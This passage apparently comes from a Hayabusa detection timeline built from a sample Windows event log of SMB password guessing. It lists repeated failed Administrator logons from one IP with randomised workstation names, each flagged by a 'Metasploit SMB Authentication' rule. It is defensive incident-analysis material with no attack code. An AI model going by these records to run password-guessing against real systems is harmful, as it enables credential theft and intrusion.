Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
